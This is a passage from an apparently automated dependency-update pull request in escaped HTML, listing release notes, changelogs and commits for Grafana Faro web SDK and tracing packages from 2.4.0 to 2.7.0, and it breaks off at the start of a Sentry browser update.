href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2015\"\u003e#2015\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/fedbe7ff41c592a7782737ea2200680cf8796800\"\u003efedbe7f\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eweb-sdk:\u003c/strong\u003e add \u003ccode\u003ehttpHost\u003c/code\u003e to \u003ccode\u003efaro.performance.resource\u003c/code\u003e events (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2014\"\u003e#2014\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/517d26f17f96d21990e52c5804a0b77676f685df\"\u003e517d26f\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eci:\u003c/strong\u003e anchor release-please at v2.5.0 commit on main (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2061\"\u003e#2061\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/9a99abf6c119c17652335880d0116321d0036a1e\"\u003e9a99abf\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eci:\u003c/strong\u003e consolidate release-please into single changelog and unblock release PR (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2048\"\u003e#2048\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/14540489ca20ff2e1797700f14e440a7ea637709\"\u003e1454048\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eci:\u003c/strong\u003e correct jsonpath syntax in release-please extra-files (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2049\"\u003e#2049\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/0ca2dfe5d833c871ed115b9ed07854ea4e4fdbfb\"\u003e0ca2dfe\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eci:\u003c/strong\u003e correct release-please changelog-path to unblock release flow (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2045\"\u003e#2045\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/1682dd9b959f7ac336d61fd65b91838e9166e87c\"\u003e1682dd9\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eci:\u003c/strong\u003e exclude CHANGELOG.md from markdownlint (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2062\"\u003e#2062\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/844256be8dfaf615c254f65bacb958c4a7eebfb4\"\u003e844256b\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eci:\u003c/strong\u003e pre-format release-please PR to satisfy prettier check (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2051\"\u003e#2051\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/848ad907e7b1dc8b866b10335b3ecce3354e99a2\"\u003e848ad90\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eci:\u003c/strong\u003e two-stage yarn install in release-please cleanup step (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2053\"\u003e#2053\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/b87bd7c5e50eb76555a2477b0bdecda43c6ff473\"\u003eb87bd7c\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update npm-dependencies (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2058\"\u003e#2058\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/7f4f4d5f679671f04cdab654c194bdbb9ed42332\"\u003e7f4f4d5\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/8313816ee0a4a5307e92a95b596d0961b28b4b7d\"\u003e\u003ccode\u003e8313816\u003c/code\u003e\u003c/a\u003e chore: release 2.7.0 (\u003ca href=\"https://github.com/grafana/faro-web-sdk/tree/HEAD/packages/web-sdk/issues/2074\"\u003e#2074\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/ee4515a69fb00a776060ec721a19e8d02ba8c4b3\"\u003e\u003ccode\u003eee4515a\u003c/code\u003e\u003c/a\u003e chore(deps): update patch updates (\u003ca href=\"https://github.com/grafana/faro-web-sdk/tree/HEAD/packages/web-sdk/issues/2076\"\u003e#2076\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/ef2d248259f99e3e712bceff0f6fc99f6b0d81e1\"\u003e\u003ccode\u003eef2d248\u003c/code\u003e\u003c/a\u003e fix: pin package manager and disable yarn/npm scripts (\u003ca href=\"https://github.com/grafana/faro-web-sdk/tree/HEAD/packages/web-sdk/issues/2075\"\u003e#2075\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/028edd5f7178e0cde08811a40e23aae96dbf91ae\"\u003e\u003ccode\u003e028edd5\u003c/code\u003e\u003c/a\u003e chore: release 2.6.3 (\u003ca href=\"https://github.com/grafana/faro-web-sdk/tree/HEAD/packages/web-sdk/issues/2070\"\u003e#2070\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/17193d67d1bd31587acc1a738138493a5fa6671f\"\u003e\u003ccode\u003e17193d6\u003c/code\u003e\u003c/a\u003e chore(main): release 2.6.2 (\u003ca href=\"https://github.com/grafana/faro-web-sdk/tree/HEAD/packages/web-sdk/issues/2068\"\u003e#2068\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/de333f1de47cc520dd91aeb574325e6275564f86\"\u003e\u003ccode\u003ede333f1\u003c/code\u003e\u003c/a\u003e chore: release 2.6.1 (\u003ca href=\"https://github.com/grafana/faro-web-sdk/tree/HEAD/packages/web-sdk/issues/2064\"\u003e#2064\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/477938cfe351474ca7a609883e84a8eaee6c3457\"\u003e\u003ccode\u003e477938c\u003c/code\u003e\u003c/a\u003e chore: release main (\u003ca href=\"https://github.com/grafana/faro-web-sdk/tree/HEAD/packages/web-sdk/issues/2052\"\u003e#2052\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/dff5c2d652ddd8ac859c3bd1b1311e91cb53fe25\"\u003e\u003ccode\u003edff5c2d\u003c/code\u003e\u003c/a\u003e chore(deps): update patch updates (\u003ca href=\"https://github.com/grafana/faro-web-sdk/tree/HEAD/packages/web-sdk/issues/2057\"\u003e#2057\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/517d26f17f96d21990e52c5804a0b77676f685df\"\u003e\u003ccode\u003e517d26f\u003c/code\u003e\u003c/a\u003e feat(web-sdk): add \u003ccode\u003ehttpHost\u003c/code\u003e to \u003ccode\u003efaro.performance.resource\u003c/code\u003e events (\u003ca href=\"https://github.com/grafana/faro-web-sdk/tree/HEAD/packages/web-sdk/issues/2014\"\u003e#2014\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/0c6603eacb286719e363ac0ad44d0712bbf81cb3\"\u003e\u003ccode\u003e0c6603e\u003c/code\u003e\u003c/a\u003e chore(release): bump packages to v2.5.0 (\u003ca href=\"https://github.com/grafana/faro-web-sdk/tree/HEAD/packages/web-sdk/issues/2021\"\u003e#2021\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/grafana/faro-web-sdk/commits/v2.7.0/packages/web-sdk\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@grafana/faro-web-tracing` from 2.4.0 to 2.7.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/grafana/faro-web-sdk/releases\"\u003e@​grafana/faro-web-tracing's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.7.0\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/grafana/faro-web-sdk/compare/v2.6.3...v2.7.0\"\u003e2.7.0\u003c/a\u003e (2026-05-20)\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ecore:\u003c/strong\u003e include git commit hash in app meta (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2039\"\u003e#2039\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/9c82ce49bc6d02c8a9b9a83227f101ce224a79b8\"\u003e9c82ce4\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ecore:\u003c/strong\u003e fall back to window when resolving Metro bundle id (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2079\"\u003e#2079\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/3cfd6204b7bc83e5c440c523b6287993ccfbd728\"\u003e3cfd620\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003edemo:\u003c/strong\u003e bind Tempo OTLP receiver to 0.0.0.0 so Alloy can reach it (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2038\"\u003e#2038\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/7a0af536a4a7254bf62473b20d04cf937ecd246a\"\u003e7a0af53\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003edemo:\u003c/strong\u003e use \u003ccode\u003egrafana server\u003c/code\u003e subcommand for Grafana 13 image (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2035\"\u003e#2035\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/5d9210769e5e0752f41a3f543089397d9fe8149a\"\u003e5d92107\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update npm-dependencies (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2077\"\u003e#2077\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/8574f5579b8c84a829269aa7e19e76238daa6b6e\"\u003e8574f55\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003epin package manager and disable yarn/npm scripts (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2075\"\u003e#2075\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/ef2d248259f99e3e712bceff0f6fc99f6b0d81e1\"\u003eef2d248\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.6.3\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/grafana/faro-web-sdk/compare/v2.6.2...v2.6.3\"\u003e2.6.3\u003c/a\u003e (2026-05-11)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eci:\u003c/strong\u003e make release-please auto-tag on merge (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2069\"\u003e#2069\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/de9e2f05c28ea5644a8f8647c41f8eb686e2736c\"\u003ede9e2f0\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.6.2\u003c/h2\u003e\n\u003cp\u003eSee \u003ca href=\"https://github.com/grafana/faro-web-sdk/blob/v2.6.2/CHANGELOG.md\"\u003eCHANGELOG.md\u003c/a\u003e for the full list of changes.\u003c/p\u003e\n\u003cp\u003eThis release was tagged manually as a one-off recovery. Release-please's title parser still doesn't match merged release PRs back to their config because of how it handles \u003ccode\u003ecomponent\u003c/code\u003e together with \u003ccode\u003einclude-component-in-tag: false\u003c/code\u003e. A follow-up will redesign the release-please configuration.\u003c/p\u003e\n\u003ch2\u003ev2.6.1\u003c/h2\u003e\n\u003cp\u003eSee \u003ca href=\"https://github.com/grafana/faro-web-sdk/blob/v2.6.1/CHANGELOG.md\"\u003eCHANGELOG.md\u003c/a\u003e for the full list of changes.\u003c/p\u003e\n\u003cp\u003eThis release was tagged manually as a one-off recovery; release-please could not auto-tag PR \u003ca href=\"https://github.com/grafana/faro-web-sdk/tree/HEAD/packages/web-tracing/issues/2064\"\u003e#2064\u003c/a\u003e because the title pattern was missing \u003ccode\u003e${component}\u003c/code\u003e. Fixed in \u003ca href=\"https://github.com/grafana/faro-web-sdk/tree/HEAD/packages/web-tracing/issues/2066\"\u003e#2066\u003c/a\u003e \\u2014 the next release will tag automatically.\u003c/p\u003e\n\u003ch2\u003ev2.6.0\u003c/h2\u003e\n\u003cp\u003eSee \u003ca href=\"https://github.com/grafana/faro-web-sdk/blob/v2.6.0/CHANGELOG.md\"\u003eCHANGELOG.md\u003c/a\u003e for the full list of changes.\u003c/p\u003e\n\u003cp\u003eThis release was tagged manually as a one-off recovery; release-please could not auto-tag PR \u003ca href=\"https://github.com/grafana/faro-web-sdk/tree/HEAD/packages/web-tracing/issues/2052\"\u003e#2052\u003c/a\u003e because its title (\u003ccode\u003echore: release main\u003c/code\u003e) lacked \u003ccode\u003e${version}\u003c/code\u003e. The PR title pattern was fixed in \u003ca href=\"https://github.com/grafana/faro-web-sdk/tree/HEAD/packages/web-tracing/issues/2063\"\u003e#2063\u003c/a\u003e — future releases will tag automatically.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/grafana/faro-web-sdk/blob/main/CHANGELOG.md\"\u003e@​grafana/faro-web-tracing's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/grafana/faro-web-sdk/compare/v2.6.3...v2.7.0\"\u003e2.7.0\u003c/a\u003e (2026-05-20)\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ecore:\u003c/strong\u003e include git commit hash in app meta (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2039\"\u003e#2039\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/9c82ce49bc6d02c8a9b9a83227f101ce224a79b8\"\u003e9c82ce4\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ecore:\u003c/strong\u003e fall back to window when resolving Metro bundle id (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2079\"\u003e#2079\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/3cfd6204b7bc83e5c440c523b6287993ccfbd728\"\u003e3cfd620\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003edemo:\u003c/strong\u003e bind Tempo OTLP receiver to 0.0.0.0 so Alloy can reach it (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2038\"\u003e#2038\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/7a0af536a4a7254bf62473b20d04cf937ecd246a\"\u003e7a0af53\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003edemo:\u003c/strong\u003e use \u003ccode\u003egrafana server\u003c/code\u003e subcommand for Grafana 13 image (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2035\"\u003e#2035\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/5d9210769e5e0752f41a3f543089397d9fe8149a\"\u003e5d92107\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update npm-dependencies (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2077\"\u003e#2077\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/8574f5579b8c84a829269aa7e19e76238daa6b6e\"\u003e8574f55\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003epin package manager and disable yarn/npm scripts (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2075\"\u003e#2075\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/ef2d248259f99e3e712bceff0f6fc99f6b0d81e1\"\u003eef2d248\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/grafana/faro-web-sdk/compare/v2.6.2...v2.6.3\"\u003e2.6.3\u003c/a\u003e (2026-05-11)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eci:\u003c/strong\u003e make release-please auto-tag on merge (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2069\"\u003e#2069\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/de9e2f05c28ea5644a8f8647c41f8eb686e2736c\"\u003ede9e2f0\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/grafana/faro-web-sdk/compare/v2.6.1...v2.6.2\"\u003e2.6.2\u003c/a\u003e (2026-05-11)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eci:\u003c/strong\u003e include ${component} in release-please PR title (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2066\"\u003e#2066\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/367aacc76fbb4777a61da40652bbe891826e0039\"\u003e367aacc\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/grafana/faro-web-sdk/compare/v2.6.0...v2.6.1\"\u003e2.6.1\u003c/a\u003e (2026-05-11)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eci:\u003c/strong\u003e set release-please PR title pattern with version (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2063\"\u003e#2063\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/4310b1685b4963de539919a15edd797aa21d032b\"\u003e4310b16\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/grafana/faro-web-sdk/compare/v2.5.0...v2.6.0\"\u003e2.6.0\u003c/a\u003e (2026-05-11)\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ereplay:\u003c/strong\u003e pause recording after user inactivity (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2015\"\u003e#2015\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/fedbe7ff41c592a7782737ea2200680cf8796800\"\u003efedbe7f\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eweb-sdk:\u003c/strong\u003e add \u003ccode\u003ehttpHost\u003c/code\u003e to \u003ccode\u003efaro.performance.resource\u003c/code\u003e events (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2014\"\u003e#2014\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/517d26f17f96d21990e52c5804a0b77676f685df\"\u003e517d26f\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eci:\u003c/strong\u003e anchor release-please at v2.5.0 commit on main (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2061\"\u003e#2061\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/9a99abf6c119c17652335880d0116321d0036a1e\"\u003e9a99abf\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eci:\u003c/strong\u003e consolidate release-please into single changelog and unblock release PR (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2048\"\u003e#2048\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/14540489ca20ff2e1797700f14e440a7ea637709\"\u003e1454048\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eci:\u003c/strong\u003e correct jsonpath syntax in release-please extra-files (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2049\"\u003e#2049\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/0ca2dfe5d833c871ed115b9ed07854ea4e4fdbfb\"\u003e0ca2dfe\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eci:\u003c/strong\u003e correct release-please changelog-path to unblock release flow (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2045\"\u003e#2045\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/1682dd9b959f7ac336d61fd65b91838e9166e87c\"\u003e1682dd9\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eci:\u003c/strong\u003e exclude CHANGELOG.md from markdownlint (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2062\"\u003e#2062\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/844256be8dfaf615c254f65bacb958c4a7eebfb4\"\u003e844256b\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eci:\u003c/strong\u003e pre-format release-please PR to satisfy prettier check (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2051\"\u003e#2051\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/848ad907e7b1dc8b866b10335b3ecce3354e99a2\"\u003e848ad90\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eci:\u003c/strong\u003e two-stage yarn install in release-please cleanup step (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2053\"\u003e#2053\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/b87bd7c5e50eb76555a2477b0bdecda43c6ff473\"\u003eb87bd7c\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update npm-dependencies (\u003ca href=\"https://redirect.github.com/grafana/faro-web-sdk/issues/2058\"\u003e#2058\u003c/a\u003e) (\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/7f4f4d5f679671f04cdab654c194bdbb9ed42332\"\u003e7f4f4d5\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/8313816ee0a4a5307e92a95b596d0961b28b4b7d\"\u003e\u003ccode\u003e8313816\u003c/code\u003e\u003c/a\u003e chore: release 2.7.0 (\u003ca href=\"https://github.com/grafana/faro-web-sdk/tree/HEAD/packages/web-tracing/issues/2074\"\u003e#2074\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/8574f5579b8c84a829269aa7e19e76238daa6b6e\"\u003e\u003ccode\u003e8574f55\u003c/code\u003e\u003c/a\u003e fix(deps): update npm-dependencies (\u003ca href=\"https://github.com/grafana/faro-web-sdk/tree/HEAD/packages/web-tracing/issues/2077\"\u003e#2077\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/ef2d248259f99e3e712bceff0f6fc99f6b0d81e1\"\u003e\u003ccode\u003eef2d248\u003c/code\u003e\u003c/a\u003e fix: pin package manager and disable yarn/npm scripts (\u003ca href=\"https://github.com/grafana/faro-web-sdk/tree/HEAD/packages/web-tracing/issues/2075\"\u003e#2075\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/028edd5f7178e0cde08811a40e23aae96dbf91ae\"\u003e\u003ccode\u003e028edd5\u003c/code\u003e\u003c/a\u003e chore: release 2.6.3 (\u003ca href=\"https://github.com/grafana/faro-web-sdk/tree/HEAD/packages/web-tracing/issues/2070\"\u003e#2070\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/17193d67d1bd31587acc1a738138493a5fa6671f\"\u003e\u003ccode\u003e17193d6\u003c/code\u003e\u003c/a\u003e chore(main): release 2.6.2 (\u003ca href=\"https://github.com/grafana/faro-web-sdk/tree/HEAD/packages/web-tracing/issues/2068\"\u003e#2068\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/de333f1de47cc520dd91aeb574325e6275564f86\"\u003e\u003ccode\u003ede333f1\u003c/code\u003e\u003c/a\u003e chore: release 2.6.1 (\u003ca href=\"https://github.com/grafana/faro-web-sdk/tree/HEAD/packages/web-tracing/issues/2064\"\u003e#2064\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/477938cfe351474ca7a609883e84a8eaee6c3457\"\u003e\u003ccode\u003e477938c\u003c/code\u003e\u003c/a\u003e chore: release main (\u003ca href=\"https://github.com/grafana/faro-web-sdk/tree/HEAD/packages/web-tracing/issues/2052\"\u003e#2052\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/7f4f4d5f679671f04cdab654c194bdbb9ed42332\"\u003e\u003ccode\u003e7f4f4d5\u003c/code\u003e\u003c/a\u003e fix(deps): update npm-dependencies (\u003ca href=\"https://github.com/grafana/faro-web-sdk/tree/HEAD/packages/web-tracing/issues/2058\"\u003e#2058\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/0c6603eacb286719e363ac0ad44d0712bbf81cb3\"\u003e\u003ccode\u003e0c6603e\u003c/code\u003e\u003c/a\u003e chore(release): bump packages to v2.5.0 (\u003ca href=\"https://github.com/grafana/faro-web-sdk/tree/HEAD/packages/web-tracing/issues/2021\"\u003e#2021\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/grafana/faro-web-sdk/commit/445f3859b954ac2277aea361844ac5cb6615d9b0\"\u003e\u003ccode\u003e445f385\u003c/code\u003e\u003c/a\u003e fix(deps): update npm-dependencies (\u003ca href=\"https://github.com/grafana/faro-web-sdk/tree/HEAD/packages/web-tracing/issues/2019\"\u003e#2019\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/grafana/faro-web-sdk/commits/v2.7.0/packages/web-tracing\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@sentry/browser` from 10.51.0 to 10.53.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/getsentry/sentry-javascript/releases\"\u003e@​sentry/browser's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e10.53.1\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix(core): Don't gate user data for streamed spans at scope read time (\u003ca href=\"https://redirect.github.com/getsentry/sentry-javascript/pull/20827\"\u003e#20827\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003efix(core): Include subpath type shims in published package (\u003ca 